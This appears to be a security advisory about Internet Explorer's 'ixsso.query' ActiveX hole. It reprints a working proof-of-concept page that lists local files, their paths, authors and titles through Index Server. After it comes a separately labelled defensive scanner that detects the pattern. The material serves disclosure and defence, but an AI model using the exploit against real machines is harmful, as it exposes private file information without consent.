An issue with the "ixsso.query" ActiveX object causes Internet Explorer 5.x, Outlook, Outlook Express, and Windows 2000 with Microsoft Index Server to be vulnerable to unauthorized file searching.

DEMONSTRATION

Georgi Guninski made the following code available:

--------indexserv1.html-------------------------------------------
<INPUT TYPE="BUTTON" VALUE="Search" onclick="g(document.all.query.value)">
<INPUT TYPE="BUTTON" VALUE="Find *.txt files" onclick="g('@filename = *.txt')">
<SCRIPT>
function g(q1)
{
  qu=new ActiveXObject("ixsso.query");
  qu.Catalog="System";
  //qu.query="@contents name";
  //qu.query="#filename .htm or name near test";
  //qu.query='@filename = *.doc ';
  qu.query=q1;
  qu.Columns="filename, path, doctitle, doccomments, docauthor, size";
  rs=qu.CreateRecordset("nonsequential");
  //alert("Records: "+rs.RecordCount);
  doc=window.frames[0].document;
  doc.writeln("SEARCH RESULTS Records: "+rs.RecordCount+"");
  doc.writeln("<TABLE BORDER=2>");
  doc.writeln("<TR><TD>Path</TD><TD>size</TD> <TD>DocAuthor</TD><TD>DocTitle</TD></TR>");
  while (!rs.EOF)
  {
    doc.writeln("<TR><TD><A TARGET='_blank' HREF='file://"+rs("Path")+"'</A>"+rs("Path")+"</TD> <TD>"+rs("size")+"</TD><TD>"+rs("DocAuthor")+"</TD> <TD>"+rs("DocTitle")+"</TD></TR>");
    rs.MoveNext();
  }
  doc.writeln("</TABLE>");
}
//setTimeout("g()",1000);
</SCRIPT>
---------------------------------------------------------------------

VENDOR RESPONSE

Georgi Guninski reported this issue to Microsoft on November 6, 2000. I contacted Microsoft as well and they are working on a patch. Unfortunately, Microsoft was only given four days to address the issue and has not completed the patch.

CREDIT
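
A defensive check for the pattern in the demonstration above, as an added example that is not part of the original advisory or of Georgi Guninski's code: it scans HTML or mail bodies for script that instantiates "ixsso.query" and reports how the object is then used. The function name, the finding fields and both sample inputs are constructed for illustration.

```javascript
// Added example (not from the advisory): flag HTML or mail bodies whose
// script instantiates the Index Server query object.
const PROGID = "ixsso.query"; // ProgIDs are case-insensitive

// JScript:  x = new ActiveXObject("ixsso.query")
// VBScript: Set x = CreateObject("ixsso.query")
const CREATE_RE =
  /(?:([A-Za-z_$][\w$]*)\s*=\s*)?(?:new\s+ActiveXObject|CreateObject)\s*\(\s*(["'])([^"']+)\2\s*\)/gi;

function scanForIxsso(html) {
  const findings = [];
  for (const m of html.matchAll(CREATE_RE)) {
    if (m[3].toLowerCase() !== PROGID) continue;
    const f = { variable: m[1] || null, offset: m.index, catalog: null,
                dynamicQuery: false, createsRecordset: false };
    if (f.variable) {
      const v = f.variable.replace(/\$/g, "\\$");
      // Simplification: look at everything after the instantiation,
      // without tracking script or function scope.
      const rest = html.slice(m.index);
      const cat = rest.match(
        new RegExp(v + "\\.Catalog\\s*=\\s*([\"'])(.*?)\\1", "i"));
      if (cat) f.catalog = cat[2];
      // Query text taken from a variable rather than a string literal.
      f.dynamicQuery = new RegExp(
        "(?<![\\w$])" + v + "\\.query\\s*=\\s*[A-Za-z_$]", "i").test(rest);
      f.createsRecordset = new RegExp(
        "(?<![\\w$])" + v + "\\.CreateRecordset\\s*\\(", "i").test(rest);
    }
    findings.push(f);
  }
  return findings;
}

// Constructed samples: the first is trimmed from the listing above.
const SAMPLE_SUSPECT = `<SCRIPT>
function g(q1) {
  qu=new ActiveXObject("ixsso.query");
  qu.Catalog="System";
  //qu.query='@filename = *.doc ';
  qu.query=q1;
  rs=qu.CreateRecordset("nonsequential");
}
</SCRIPT>`;
const SAMPLE_BENIGN =
  '<script>var d = new ActiveXObject("Scripting.Dictionary");</script>';

console.log(scanForIxsso(SAMPLE_SUSPECT));
```

A finding with `createsRecordset` set on content that arrived from the web or by mail is the combination the advisory describes; the commented-out literal queries in the sample do not set `dynamicQuery`.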